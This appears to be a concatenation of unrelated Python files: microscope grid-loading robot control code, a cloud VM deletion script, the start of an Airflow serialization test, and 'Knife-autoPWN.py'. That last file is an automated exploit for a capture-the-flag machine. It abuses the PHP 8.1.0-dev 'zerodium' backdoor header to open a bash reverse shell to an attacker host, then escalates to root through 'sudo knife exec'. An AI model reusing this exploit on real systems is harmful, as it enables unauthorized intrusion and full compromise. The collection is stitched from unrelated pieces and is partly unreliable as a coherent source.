self.timings = {}
self.gridnumber = None
self.startevent = threading.Event()
self.exitevent = threading.Event()
self.extractinfo = None
self.extractcondition = threading.Condition()
self.gridcleared = threading.Event()
self.usercontinue = threading.Event()
self.emailclient = emailnotification.EmailClient(self)
self.simulate = False
self.startnowait = False
self.traysFromDB()
self.queue = Queue.Queue()
threading.Thread(name='robot control queue handler thread',
target=self._queueHandler).start()
self.addEventInput(event.MosaicDoneEvent, self.handleGridDataCollectionDone)
self.addEventInput(event.TargetListDoneEvent,
self.handleGridDataCollectionDone)
self.addEventInput(event.QueueGridEvent, self.handleQueueGrid)
self.addEventInput(event.QueueGridsEvent, self.handleQueueGrids)
self.addEventInput(event.UnloadGridEvent, self.handleUnloadGrid)
self.start()
def traysFromDB(self):
# if label is same, kinda screwed
self.gridtrayids = {}
self.gridtraylabels = {}
try:
projectdata = project.ProjectData()
gridboxes = projectdata.getGridBoxes()
for i in gridboxes.getall():
self.gridtrayids[i['label']] = i['gridboxId']
self.gridtraylabels[i['gridboxId']] = i['label']
except Exception, e:
self.logger.error('Failed to connect to the project database: %s' % e)
def userContinue(self):
self.usercontinue.set()
def handleQueueGrids(self, ievent):
'''
Handle queue of grids from another node.
Wait for user to click start before inserting into the queue.
'''
# wait for user to start
self.logger.info('Grid load request has been made' + ', press \'Start\' button to begin processing')
self.setStatus('user input')
self.startevent.clear()
self.startevent.wait()
nodename = ievent['node']
# insert all the grids before handling them
for gridid in ievent['grid IDs']:
number = self.getGridNumber(gridid)
while number is None:
self.setStatus('idle')
self.logger.info('Waiting for user to switch tray')
self.setStatus('user input')
self.panel.onWaitForTrayChanged()
self.startevent.clear()
self.startevent.wait()
number = self.getGridNumber(gridid)
request = GridRequest(number, gridid, nodename)
self.queue.put(request)
self.startnowait = True
self._queueHandler()
def handleQueueGrid(self, ievent):
newevent = {}
newevent['node'] = ievent['node']
newevent['grid IDs'] = [ievent['grid ID'],]
self.handleQueueGrids(newevent)
def handleUnloadGrid(self, evt):
gridid = evt['grid ID']
node = evt['node']
self.extractcondition.acquire()
self.extractinfo = (gridid, node)
self.extractcondition.notify()
self.extractcondition.release()
def getCommunication(self):
if self.settings['simulate']:
self.simulate = True
return TestCommunication()
try:
com = DatabaseCommunication()
self.simulate = False
except:
com = TestCommunication()
self.simulate = True
return com
def _queueHandler(self):
self.logger.info('_queueHandler '+str(self.simulate)+' setting'+str(self.settings['simulate']))
self.communication = self.getCommunication()
request = None
self.communication.Signal11 = int(self.settings['grid clear wait'])
while True:
### need to wait if something goes wrong
if not self.startnowait:
self.usercontinue.clear()
self.logger.warning('You may need to click on "Continue" tool after clickin "Start" tool to start')
self.usercontinue.wait()
self.zeroStage()
if self.exitevent.isSet():
break
while True:
try:
request = self.queue.get(block=False)
if isinstance(request, ExitRequest):
break
except Queue.Empty:
request = self.getUserGridRequest()
if request is None:
self.startnowait = False
break
gridid = request.gridid
evt = event.GridLoadedEvent()
evt['request node'] = request.node
evt['grid'] = leginondata.GridData(initializer={'grid ID': gridid})
evt['status'] = 'failed'
gridnumber = request.number
self.selectGrid(gridnumber)
if gridnumber is None:
evt['status'] = 'invalid'
self.outputEvent(evt)
return
self.communication = self.getCommunication()
self.setStatus('processing')
self.selectGrid(gridnumber)
self.logger.info('grid selected')
self.gridnumber = gridnumber
try:
griddata = self.insert()
except GridLoadError:
self.gridnumber = None
continue
except GridLoadFromTrayError:
self.gridnumber = None
self.startnowait = True
self.outputEvent(evt)
request.event.set()
continue
self.setStatus('idle')
evt['grid'] = griddata
if griddata is None:
break
self.startnowait = False
if hasattr(request, 'loaded'):
evt['status'] = 'ok'
if hasattr(request, 'griddata'):
request.griddata = griddata
self.outputEvent(evt)
request.event.set()
self.extractcondition.acquire()
if request.gridid is None and request.node is None:
self.panel.gridInserted()
while (self.extractinfo is None
or self.extractinfo != (request.gridid, request.node)):
self.extractcondition.wait()
self.communication = self.getCommunication()
self.setStatus('processing')
self.extractinfo = None
self.extractcondition.release()
self.extract()
self.gridnumber = None
self.setStatus('idle')
self.setStatus('idle')
self.panel.gridQueueEmpty()
del self.communication
def startProcessing(self):
self.startevent.set()
def exit(self):
self.exitevent.set()
self.startevent.set()
node.Node.exit(self)
def lockScope(self):
self.logger.info('Locking scope...')
self.instrument.tem.lock()
self.logger.info('Scope locked.')
def unlockScope(self):
self.logger.info('Unlocking scope...')
self.instrument.tem.unlock()
self.logger.info('Scope unlocked.')
def zeroStage(self):
while True:
self.logger.info('Zeroing stage position...')
self.instrument.tem.StagePosition = {'x': 0.0, 'y': 0.0, 'z': 0.0, 'a': 0.0}
if self.stageIsZeroed():
break
else:
self.logger.info('Stage is not zeroed, trying again...')
self.logger.info('Stage position is zeroed.')
def stageIsZeroed(self, xyzlimit=1e-6, alimit=0.001):
stage = self.instrument.tem.StagePosition
x = abs(stage['x'])
y = abs(stage['y'])
z = abs(stage['z'])
a = abs(stage['a'])
if x<xyzlimit and y<xyzlimit and z<xyzlimit and a<alimit:
return True
else:
return False
def moveStagePositionZ(self,zval):
self.logger.info("Move stage position Z to: %s",zval)
self.instrument.tem.StagePosition = {'z': zval}
def holderNotInScope(self):
self.logger.info('Verifying there is no holder inserted...')
self.waitScope('HolderStatus', 'not inserted')
self.logger.info('No holder currently inserted.')
def holderInScope(self):
self.logger.info('Verifying holder is inserted...')
self.waitScope('HolderStatus', 'inserted')
self.logger.info('No holder currently inserted.')
def vacuumReady(self):
self.logger.info('Verifying vacuum is ready...')
self.waitScope('VacuumStatus', 'ready', 0.25)
self.logger.info('Vacuum is ready.')
def openColumnValves(self):
self.logger.info('Opening column valves...')
self.instrument.tem.ColumnValvePosition = 'open'
self.logger.info('Verifying column valves are open...')
self.waitScope('ColumnValvePosition', 'open', 0.25)
self.logger.info('Column valves are open.')
def closeColumnValves(self):
self.logger.info('Closing column valves...')
self.instrument.tem.ColumnValvePosition = 'closed'
self.logger.info('Verifying column valves are closed...')
self.waitScope('ColumnValvePosition', 'closed', 0.25)
self.logger.info('Column valves are closed.')
def turboPumpOn(self):
self.logger.info('Turning on turbo pump...')
self.instrument.tem.TurboPump = 'on'
self.logger.info('Verifying turbo pump is on...')
self.waitScope('TurboPump', 'on', 0.25)
self.logger.info('Turbo pump is on.')
def turboPumpOff(self):
self.logger.info('Turning off turbo pump...')
self.instrument.tem.TurboPump = 'off'
#self.logger.info('Verifying turbo pump is off...')
#self.waitScope('TurboPump', 'off', 0.25)
self.logger.info('Turbo pump is off.')
def stageReady(self):
self.logger.info('Waiting for stage to be ready...')
self.waitScope('StageStatus', 'ready', 0.25)
self.logger.info('Stage is ready...')
def setHolderType(self):
#type = 'single tilt'
type = 'cryo'
self.logger.info('Setting holder type to %s...' % (type,))
self.instrument.tem.HolderType = type
self.logger.info('Verifying holder type is set to %s...' % (type,))
self.waitScope('HolderType', type, 0.25)
self.logger.info('Holder type is set to %s.' % (type,))
def getColumnPressureThreshold(self):
threshold = self.settings['column pressure threshold']
if threshold is None:
threshold = self.defaultcolumnpressurethreshold
return threshold
def getDefaultZPosition(self):
defzposition = self.settings['default Z position']
if defzposition is None:
defzposition = self.defaultzposition
return defzposition
def checkColumnPressure(self):
threshold = self.getColumnPressureThreshold()
self.logger.info('Checking column pressure...')
while self.instrument.tem.ColumnPressure > threshold:
time.sleep(0.1)
threshold = self.getColumnPressureThreshold()
self.logger.info('Column pressure is below threshold.')
def checkHighTensionOn(self):
self.logger.info('Checking high tension state...')
self.waitScope('HighTensionState', 'on', 0.25)
self.logger.info('High tension is on.')
def insertCameras(self):
ccdcameras = self.instrument.getCCDCameraNames()
for ccdcamera in ccdcameras:
self.instrument.setCCDCamera(ccdcamera)
if self.instrument.ccdcamera.hasAttribute('Inserted'):
self.logger.info('Inserting %s camera...' % ccdcamera)
self.instrument.ccdcamera.Inserted = True
self.waitScope('Inserted', True, 0.25)
self.logger.info('%s camera is inserted.' % ccdcamera)
def retractCameras(self):
ccdcameras = self.instrument.getCCDCameraNames()
for ccdcamera in ccdcameras:
self.instrument.setCCDCamera(ccdcamera)
if self.instrument.ccdcamera.hasAttribute('Inserted'):
self.logger.info('Retracting %s camera...' % ccdcamera)
self.instrument.ccdcamera.Inserted = False
self.waitScope('Inserted', False, 0.25)
self.logger.info('%s camera is retracted.' % ccdcamera)
def scopeReadyForInsertion1(self):
self.logger.info('Readying microscope for insertion step 1...')
self.zeroStage()
self.holderNotInScope()
self.vacuumReady()
self.closeColumnValves()
self.stageReady()
self.logger.info('Microscope ready for insertion step 1.')
def scopeReadyForInsertion2(self):
self.logger.info('Readying microscope for insertion step 2...')
self.setHolderType()
self.stageReady()
self.logger.info('Microscope ready for insertion step 2.')
def scopeReadyForExtraction(self):
self.logger.info('Readying microscope for extraction...')
self.closeColumnValves()
self.retractCameras()
self.zeroStage()
self.holderInScope()
self.vacuumReady()
self.stageReady()
self.logger.info('Microscope ready for extraction.')
def scopeReadyForImaging(self):
self.logger.info('Readying microscope for imaging...')
if not self.settings['turbo on']:
self.turboPumpOff()
self.insertCameras()
self.checkHighTensionOn()
self.vacuumReady()
zposition = self.getDefaultZPosition()
if zposition:
self.moveStagePositionZ(zposition)
self.checkColumnPressure()
self.openColumnValves()
self.logger.info('Microscope ready for imaging.')
def signalRobotToInsert1(self):
self.logger.info('Signaling robot to begin insertion step 1')
self.communication.Signal1 = 1
self.logger.info('Signaled robot to begin insertion step 1')
def signalRobotToInsert2(self):
self.logger.info('Signaling robot to begin insertion step 2')
self.communication.Signal3 = 1
self.logger.info('Signaled robot to begin insertion step 2')
def signalRobotToExtract(self):
self.logger.info('Signaling robot to begin extraction')
self.communication.Signal6 = 1
self.logger.info('Signaled robot to begin extraction')
def emailGridClear(self, gridnumber):
m = 'Grid #%s failed to be removed from specimen holder properly'
subject = m % gridnumber
text = 'Reply to this message if grid is not in the specimen holder.\n' + \
'An image of the specimen holder is attached.'
time.sleep(5.0)
try:
raise NotImplemetedError
image = Image.open(imagefilename)
imagestring = emailnotification.PILImage2String(image)
except:
imagestring = None
self.emailclient.sendAndSet(self.gridcleared, subject, text, imagestring)
def waitForGridClear(self):
self.gridcleared.clear()
self.logger.warning('Waiting for confirmation that grid is clear')
self.setStatus('user input')
self.emailGridClear(self.gridnumber)
self.panel.clearGrid()
self.gridcleared.wait()
self.gridcleared = threading.Event()
self.communication.Signal10 = 1
def autoGridClear(self):
self.gridcleared.clear()
self.logger.info('Auto probe clearing')
self.communication.Signal10 = 1
def gridCleared(self):
self.gridcleared.set()
def waitForRobotToInsert1(self):
self.logger.info('Waiting for robot to complete insertion step 1')
while not self.communication.Signal2:
time.sleep(0.5)
self.communication.Signal2 = 0
self.logger.info('Robot has completed insertion step 1')
def waitForRobotToInsert2(self):
self.logger.info('Waiting for robot to complete insertion step 2')
while not self.communication.Signal4:
time.sleep(0.5)
self.communication.Signal4 = 0
self.logger.info('Robot has completed insertion step 2')
def robotReadyForExtraction(self):
self.logger.info('Verifying robot is ready for extraction')
while not self.communication.Signal5:
time.sleep(0.5)
self.communication.Signal5 = 0
self.logger.info('Robot is ready for extraction')
def waitForRobotToExtract(self):
self.logger.info('Waiting for robot to complete extraction')
while not self.communication.Signal7:
self.communication.Signal11 = int(self.settings['grid clear wait'])
if self.communication.Signal9:
self.logger.warning('Robot failed to remove grid from specimen holder')
if self.communication.Signal11 == 0:
self.autoGridClear()
else:
self.waitForGridClear()
self.communication.Signal9 = 0
self.setStatus('processing')
self.logger.info('Resuming operation')
time.sleep(0.5)
self.communication.Signal7 = 0
self.logger.info('Robot has completed extraction')
def getUserGridRequest(self):
gridnumber = -1
while not validateGridNumber(gridnumber):
gridnumber = self.panel.getNextGrid()
if gridnumber is None:
return None
return GridRequest(gridnumber)
def newGrid(self, gridboxid, gridnumber):
try:
projectdata = project.ProjectData()
except project.NotConnectedError, e:
self.logger.error('Failed to create grid information: %s' % e)
return None
return projectdata.newGrid('Robot Generated Grid #%d' % gridnumber,
-1, gridnumber, gridboxid, gridnumber)
def getGridNumber(self, gridid):
try:
projectdata = project.ProjectData()
except project.NotConnectedError, e:
self.logger.error('Failed to find grid information: %s' % e)
return None
grids = projectdata.getGrids()
gridsindex = grids.Index(['gridId'])
grid = gridsindex[gridid].fetchone()
if grid is None:
self.logger.error('Failed to find grid information: %s' % e)
return None
gridlabel = grid['label']
if grid['boxId'] != self.gridtrayid:
boxlabel = self.gridtraylabels[grid['boxId']]
self.logger.error('Grid "%s" is not in selected grid tray, but in "%s"' % (gridlabel,boxlabel))
return None
gridlocations = projectdata.getGridLocations()
gridlocationsindex = gridlocations.Index(['gridId'])
gridlocation = gridlocationsindex[gridid].fetchone()
if gridlocation is None:
self.logger.error('Failed to find grid number for grid "%s"' % (gridlabel))
return None
if gridlocation['gridboxId'] != self.gridtrayid:
boxlabel = self.gridtraylabels[gridlocation['gridboxId']]
self.logger.error('Last location for grid "%s" does not match selected tray, but "%s"' % (gridlabel,boxlabel))
return None
return int(gridlocation['location'])
def getGridID(self, gridboxid, gridnumber):
try:
projectdata = project.ProjectData()
except project.NotConnectedError, e:
self.logger.error('Failed to find grid information: %s' % e)
return None
gridlocations = projectdata.getGridLocations()
gridboxidindex = gridlocations.Index(['gridboxId'])
gridlocations = gridboxidindex[gridboxid].fetchall()
for gridlocation in gridlocations:
if gridlocation['location'] == gridnumber:
return gridlocation['gridId']
return self.newGrid(gridboxid, gridnumber)
def publishEMGridData(self,gridid):
try:
projectdata = project.ProjectData()
except project.NotConnectedError, e:
self.logger.error('Failed to get grid labels: %s' % e)
return None
gridinfo = projectdata.getGridInfo(gridid)
emgriddata = leginondata.EMGridData()
emgriddata['name'] = gridinfo['label']
emgriddata['project'] = gridinfo['projectId']
self.publish(emgriddata, database=True)
return emgriddata
def makeGridData(self, gridnumber):
gridid = self.getGridID(self.gridtrayid, gridnumber)
if gridid is None:
return None
emgriddata = self.publishEMGridData(gridid)
initializer = {'grid ID': gridid}
querydata = leginondata.GridData(initializer=initializer)
griddatalist = self.research(querydata)
insertion = 0
for griddata in griddatalist:
if griddata['insertion'] > insertion:
insertion = griddata['insertion']
initializer = {'grid ID': gridid, 'insertion': insertion + 1, 'emgrid': emgriddata}
griddata = leginondata.GridData(initializer=initializer)
self.publish(griddata, database=True)
return griddata
def selectGrid(self, gridnumber):
self.logger.info('Current grid: %d' % gridnumber)
self.communication.gridNumber = gridnumber
def robotReadyForInsertion(self):
self.logger.info('Verifying robot is ready for insertion')
while not self.communication.Signal0:
if self.communication.Signal8:
self.logger.warning('Robot failed to extract grid from tray')
self.communication.Signal8 = 0
raise GridLoadFromTrayError
time.sleep(0.5)
self.communication.Signal0 = 0
self.logger.info('Robot is ready for insertion')
def estimateTimeLeft(self):
if 'insert' not in self.timings:
self.timings['insert'] = []
self.timings['insert'].append(time.time())
timestring = ''
ntimings = len(self.timings['insert']) - 1
if ntimings > 0:
first = self.timings['insert'][0]
last = self.timings['insert'][-1]
ngridsleft = self.panel.getGridQueueSize()
secondsleft = (last - first)/ntimings*ngridsleft
timestring = seconds2str(secondsleft)
if timestring:
self.logger.info(timestring + ' remaining')
def insert(self):
self.lockScope()
self.logger.info('insert '+str(self.simulate)+' setting'+str(self.settings['simulate']))
if self.simulate or self.settings['simulate']:
self.estimateTimeLeft()
self.logger.info('Simulated Insertion of holder successfully completed')
try:
griddata = self.gridInserted(self.gridnumber)
except Exception, e:
self.logger.error('Failed to get scope ready for imaging: %s' % e)
self.unlockScope()
self.unlockScope()
return griddata
self.estimateTimeLeft()
self.logger.info('Inserting holder into microscope')
self.turboPumpOn()
self.robotReadyForInsertion()
try:
self.scopeReadyForInsertion1()
except Exception, e:
self.unlockScope()
self.logger.error('Failed to get scope ready for insertion 1: %s' % e)
raise
self.signalRobotToInsert1()
self.waitForRobotToInsert1()
try:
self.scopeReadyForInsertion2()
except Exception, e:
self.unlockScope()
self.logger.error('Failed to get scope ready for insertion 2: %s' % e)
raise
self.signalRobotToInsert2()
self.waitForRobotToInsert2()
self.logger.info('Insertion of holder successfully completed')
try:
griddata = self.gridInserted(self.gridnumber)
except Exception, e:
self.logger.error('Failed to get scope ready for imaging: %s' % e)
self.unlockScope()
return
self.unlockScope()
return griddata
def extract(self):
if self.simulate or self.settings['simulate']:
self.logger.info('Extraction of holder successfully completed')
return
self.logger.info('Extracting holder from microscope')
self.lockScope()
self.turboPumpOn()
self.robotReadyForExtraction()
try:
self.scopeReadyForExtraction()
except Exception, e:
self.unlockScope()
self.logger.error('Failed to get scope ready for extraction: %s' % e)
raise
self.signalRobotToExtract()
self.waitForRobotToExtract()
self.unlockScope()
self.logger.info('Extraction of holder successfully completed')
def handleGridDataCollectionDone(self, ievent):
# ...
if self.settings['pause'] and ievent:
# pause for user check
self.logger.info('setting status')
self.setStatus('user input')
self.logger.info('waiting for user to continue...')
self.usercontinue.clear()
self.usercontinue.wait()
self.usercontinue.clear()
self.setStatus('processing')
self.logger.info('continuing')
self.logger.info('extracting')
self.panel.extractingGrid()
self.extractcondition.acquire()
self.extractinfo = (None, None)
self.extractcondition.notify()
self.extractcondition.release()
evt = event.MakeTargetListEvent()
evt['grid'] = None
self.outputEvent(evt)
def getTrayLabels(self):
self.traysFromDB()
return self.gridtrayids.keys()
def setTray(self, traylabel):
try:
self.gridtrayid = self.gridtrayids[traylabel]
except KeyError:
raise ValueError('unknown tray label')
def getGridLabels(self, gridlist):
try:
projectdata = project.ProjectData()
except project.NotConnectedError, e:
self.logger.error('Failed to get grid labels: %s' % e)
return None
gridlabels = []
for gridid in gridlist:
gridlabels.append(str(projectdata.getGridLabel(gridid)))
return gridlabels
def getGridLocations(self, traylabel):
try:
gridboxid = self.gridtrayids[traylabel]
except KeyError:
raise ValueError('unknown tray label')
try:
projectdata = project.ProjectData()
except project.NotConnectedError, e:
self.logger.error('Failed to get grid locations: %s' % e)
return None
gridlocations = projectdata.getGridLocations()
gridboxidindex = gridlocations.Index(['gridboxId'])
gridlocations = gridboxidindex[gridboxid].fetchall()
gridlabels = [i['gridId'] for i in gridlocations]
return [int(i['location']) for i in gridlocations],gridlabels
def gridInserted(self, gridnumber):
evt = event.MakeTargetListEvent()
evt['grid'] = self.makeGridData(gridnumber)
evt['grid location'] = gridnumber
evt['tray label'] = self.gridtraylabels[self.gridtrayid]
if self.simulate or self.settings['simulate']:
if evt['grid'] is None:
self.logger.error('Data collection event not sent')
else:
self.outputEvent(evt)
self.logger.info('Data collection event outputted')
return evt['grid']
self.logger.info('Grid inserted.')
self.scopeReadyForImaging()
self.logger.info('Outputting data collection event')
if evt['grid'] is None:
self.logger.error('Data collection event not sent')
else:
self.outputEvent(evt)
self.logger.info('Data collection event outputted')
return evt['grid']
def waitScope(self, parameter, value, interval=None, timeout=0.0):
if self.instrument.tem.hasAttribute(parameter):
o = self.instrument.tem
elif self.instrument.ccdcamera.hasAttribute(parameter):
o = self.instrument.ccdcamera
else:
raise ValueError('invalid parameter')
parametervalue = getattr(o, parameter)
elapsed = 0.0
if interval is not None and interval > 0:
while parametervalue != value:
time.sleep(interval)
if timeout > 0.0:
elapsed += interval
if elapsed > timeout:
raise ValueError('parameter is not set to value')
parametervalue = getattr(o, parameter)
else:
if parametervalue != value:
raise ValueError('parameter is not set to value')
|
delete_vms.py
|
import logging
import threading
from cloud.clouds import Region, Cloud
from test_steps.create_vms import env_for_singlecloud_subprocess
from util.subprocesses import run_subprocess
from util.utils import thread_timeout, Timer
def delete_vms(run_id, regions: list[Region]):
with Timer("delete_vms"):
del_aws_thread = threading.Thread(
name=f"Thread-delete-AWS", target=__delete_aws_vms, args=(run_id, regions)
)
del_gcp_thread = threading.Thread(
name=f"Thread-delete-GCP", target=__delete_gcp_vms, args=(run_id, regions)
)
del_aws_thread.start()
del_gcp_thread.start()
del_aws_thread.join(timeout=thread_timeout)
if del_aws_thread.is_alive():
logging.info("%s timed out", del_aws_thread.name)
del_gcp_thread.join(timeout=6 * 60)
if del_gcp_thread.is_alive():
logging.info("%s timed out", del_gcp_thread.name)
def __delete_aws_vms(run_id, regions):
with Timer("__delete_aws_vms"):
def delete_aws_vm(aws_cloud_region: Region):
assert aws_cloud_region.cloud == Cloud.AWS, aws_cloud_region
logging.info(
"Will delete EC2 VMs from run-id %s in %s", run_id, aws_cloud_region
)
env = env_for_singlecloud_subprocess(run_id, aws_cloud_region)
script = cloud_region.deletion_script()
_ = run_subprocess(script, env)
aws_regions = [r for r in regions if r.cloud == Cloud.AWS]
del_aws_threads = []
for cloud_region in aws_regions:
del_one_aws_region_thread = threading.Thread(
name=f"Thread-delete-{cloud_region}",
target=delete_aws_vm,
args=(cloud_region,),
)
del_aws_threads.append(del_one_aws_region_thread)
del_one_aws_region_thread.start()
for del_one_aws_region_thread in del_aws_threads:
del_one_aws_region_thread.join(timeout=thread_timeout)
if del_one_aws_region_thread.is_alive():
logging.info("%s timed out", del_one_aws_region_thread.name)
def __delete_gcp_vms(run_id, regions):
with Timer("__delete_gcp_vms"):
gcp_regions = [r for r in regions if r.cloud == Cloud.GCP]
if gcp_regions:
# One arbitrary region, for getting list of VMs; deletion commands are run in sequence inside the command
cloud_region = gcp_regions[0]
logging.info("Will delete GCE VMs from run-id %s", run_id)
env = env_for_singlecloud_subprocess(run_id, cloud_region)
_ = run_subprocess(cloud_region.deletion_script(), env)
else:
# No gcp, nothing to delete
pass
|
Knife-autoPWN.py
|
#!/usr/bin/python3
#============= imports ===============
from pwn import * # pip3 install pwn
#=====================================
def banner():
print(" _ ___ _ ___ _____ _____ _ ______ ___ _ ")
print("| | / \ | |_ _| ___| ____| __ _ _ _| |_ ___ | _ \ \ / / \ | |")
print("| ' /| \| || || |_ | _| _____ / _` | | | | __/ _ \| |_) \ \ /\ / /| \| |")
print("| . \| |\ || || _| | |__|_____| (_| | |_| | || (_) | __/ \ V V / | |\ |")
print("|_|\_\_| \_|___|_| |_____| \__,_|\__,_|\__\___/|_| \_/\_/ |_| \_|")
print(" ")
print(" by z3r0byte ")
# ctrl + c
def def_handler(sig, frame):
print("\n[!] Saliendo...)\n")
sys.exit(1)
signal.signal(signal.SIGINT, def_handler)
# variables
main_url="http://10.10.10.242/"
# explotación
def mainFunc(host, puerto):
p1 = log.progress("Accediendo al sistema mediante un backdoor de PHP 8.1.0-dev")
Headers = {
'User-Agentt': 'zerodiumsystem("bash -c \' bash -i >& /dev/tcp/%s/%s 0>&1\'");' % (host.rstrip("\n"), puerto)
}
time.sleep(1)
r = requests.get(main_url, headers=Headers)
p1.success("Backdoor explotado correctamente")
if __name__ == '__main__':
banner()
try:
lport="4444"
lhost=input("\nIntroduce tu LHOST para la reverse shell: ")
threading.Thread(target=mainFunc, args=(lhost, lport)).start()
except Exception as e:
log.error(str(e))
p2 = log.progress("Obteniendo reverse shell")
shell = listen(lport, timeout=10).wait_for_connection()
if shell.sock is None:
p2.failure("No ha sido posible comprometer el sistema")
sys.exit(1)
else:
p2.success("Reverse shell obtenida")
shell.sendline(b'sudo knife exec -E \'exec "/bin/sh"\'')
shell.interactive()
|
test_dag_serialization.py
|
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"""Unit tests for stringified DAGs."""
import importlib
import importlib.util
import multiprocessing
import os
import unittest
from datetime import datetime, timedelta, timezone
from glob import glob
from unittest import mock
import pendulum
import pytest
from dateutil.relativedelta import FR, relativedelta
from kubernetes.client import models as k8s
from parameterized import parameterized
from airflow.hooks.base import BaseHook
from airflow.kubernetes.pod_generator import PodGenerator
from airflow.models import DAG, Connection, DagBag, TaskInstance
from airflow.models.baseoperator import BaseOperator, BaseOperatorLink
from airflow.operators.bash import BashOperator
from airflow.security import permissions
from airflow.serialization.json_schema import load_dag_schema_dict
from airflow.serialization.serialized_objects import SerializedBaseOperator, SerializedDAG
from airflow.timetables.simple import NullTimetable, OnceTimetable
from tests.test_utils.mock_operators import CustomOperator, CustomOpLink, GoogleLink
from tests.test_utils.timetables import cron_timetable, delta_timetable
executor_config_pod = k8s.V1Pod(
metadata=k8s.V1ObjectMeta(name="my-name"),
spec=k8s.V1PodSpec(
containers=[
k8s.V1Container(name="base", volume_mounts=[k8s.V1VolumeMount(name="my-vol", mount_path="/vol/")])
]
),
)
serialized_simple_dag_ground_truth = {
"__version": 1,
"dag": {
"default_args": {
"__type": "dict",
"__var": {
"depends_on_past": False,
"retries": 1,
"retry_delay": {"__type": "timedelta", "__var": 300.0},
"max_retry_delay": {"__type": "timedelta", "__var": 600.0},
"sla": {"__type": "timedelta", "__var": 100.0},
},
},
"start_date": 1564617600.0,
'_task_group': {
'_group_id': None,
'prefix_group_id': True,
'children': {'bash_task': ('operator', 'bash_task'), 'custom_task': ('operator', 'custom_task')},
'tooltip': '',
'ui_color': 'CornflowerBlue',
'ui_fgcolor': '#000',
'upstream_group_ids': [],
'downstream_group_ids': [],
'upstream_task_ids': [],
'downstream_task_ids': [],
},
"is_paused_upon_creation": False,
"_dag_id": "simple_dag",
"doc_md": "### DAG Tutorial Documentation",
"fileloc": None,
"tasks": [
{
"task_id": "bash_task",
"owner": "airflow",
"retries": 1,
"retry_delay": 300.0,
"max_retry_delay": 600.0,
"sla": 100.0,
"_downstream_task_ids": [],
"_inlets": [],
"_is_dummy": False,
"_outlets": [],
"ui_color": "#f0ede4",
"ui_fgcolor": "#000",
"template_fields": ['bash_command', 'env'],
"template_fields_renderers": {'bash_command': 'bash', 'env': 'json'},
"bash_command": "echo {{ task.task_id }}",
'label': 'bash_task',
"_task_type": "BashOperator",
"_task_module": "airflow.operators.bash",
"pool": "default_pool",
"executor_config": {
'__type': 'dict',
'__var': {
"pod_override": {
'__type': 'k8s.V1Pod',
'__var': PodGenerator.serialize_pod(executor_config_pod),
}
},
},
"doc_md": "### Task Tutorial Documentation",
},
{
"task_id": "custom_task",
"retries": 1,
"retry_delay": 300.0,
"max_retry_delay": 600.0,
"sla": 100.0,
"_downstream_task_ids": [],
"_inlets": [],
"_is_dummy": False,
"_outlets": [],
"_operator_extra_links": [{"tests.test_utils.mock_operators.CustomOpLink": {}}],
"ui_color": "#fff",
"ui_fgcolor": "#000",
"template_fields": ['bash_command'],
"template_fields_renderers": {},
"_task_type": "CustomOperator",
"_task_module": "tests.test_utils.mock_operators",
"pool": "default_pool",
'label': 'custom_task',
},
],
"timezone": "UTC",
"_access_control": {
"__type": "dict",
"__var": {
"test_role": {
"__type": "set",
"__var": [permissions.ACTION_CAN_READ, permissions.ACTION_CAN_EDIT],
}
},
},
"edge_info": {},
"dag_dependencies": [],
},
}
ROOT_FOLDER = os.path.realpath(
os.path.join(os.path.dirname(os.path.realpath(__file__)), os.pardir, os.pardir)
)
def make_example_dags(module_path):
"""Loads DAGs from a module for test."""
dagbag = DagBag(module_path)
return dagbag.dags
def make_simple_dag():
"""Make very simple DAG to verify serialization result."""
with DAG(
dag_id='simple_dag',
default_args={
"retries": 1,
"retry_delay": timedelta(minutes=5),
"max_retry_delay": timedelta(minutes=10),
"depends_on_past": False,
"sla": timedelta(seconds=100),
},
start_date=datetime(2019, 8, 1),
is_paused_upon_creation=False,
access_control={"test_role": {permissions.ACTION_CAN_READ, permissions.ACTION_CAN_EDIT}},
doc_md="### DAG Tutorial Documentation",
) as dag:
CustomOperator(task_id='custom_task')
BashOperator(
task_id='bash_task',
bash_command='echo {{ task.task_id }}',
owner='airflow',
executor_config={"pod_override": executor_config_pod},
doc_md="### Task Tutorial Documentation",
)
return {'simple_dag': dag}
def make_user_defined_macro_filter_dag():
"""Make DAGs with user defined macros and filters using locally defined methods.
For Webserver, we do not include ``user_defined_macros`` & ``user_defined_filters``.
The examples here test:
(1) functions can be successfully displayed on UI;
(2) templates with function macros have been rendered before serialization.
"""
def compute_next_execution_date(dag, execution_date):
return dag.following_schedule(execution_date)
default_args = {'start_date': datetime(2019, 7, 10)}
dag = DAG(
'user_defined_macro_filter_dag',
default_args=default_args,
user_defined_macros={
'next_execution_date': compute_next_execution_date,
},
user_defined_filters={'hello': lambda name: f'Hello {name}'},
catchup=False,
)
BashOperator(
task_id='echo',
bash_command='echo "{{ next_execution_date(dag, execution_date) }}"',
dag=dag,
)
return {dag.dag_id: dag}
def collect_dags(dag_folder=None):
"""Collects DAGs to test."""
dags = {}
dags.update(make_simple_dag())
dags.update(make_user_defined_macro_filter_dag())
if dag_folder:
if isinstance(dag_folder, (list, tuple)):
patterns = dag_folder
else:
patterns = [dag_folder]
else:
patterns = [
"airflow/example_dags",
"airflow/providers/*/example_dags",
"airflow/providers/*/*/example_dags",
]
for pattern in patterns:
for directory in glob(f"{ROOT_FOLDER}/{pattern}"):
dags.update(make_example_dags(directory))
# Filter subdags as they are stored in same row in Serialized Dag table
dags = {dag_id: dag for dag_id, dag in dags.items() if not dag.is_subdag}
return dags
def serialize_subprocess(queue, dag_folder):
"""Validate pickle in a subprocess."""
dags = collect_dags(dag_folder)
for dag in dags.values():
queue.put(SerializedDAG.to_json(dag))
queue.put(None)
class TestStringifiedDAGs(unittest.TestCase):
"""Unit tests for stringified DAGs."""
def setUp(self):
super().setUp()
BaseHook.get_connection = mock.Mock(
return_value=Connection(
extra=(
'{'
'"project_id": "mock", '
'"location": "mock", '
'"instance": "mock", '
'"database_type": "postgres", '
'"use_proxy": "False", '
'"use_ssl": "False"'
'}'
)
)
)
self.maxDiff = None
def test_serialization(self):
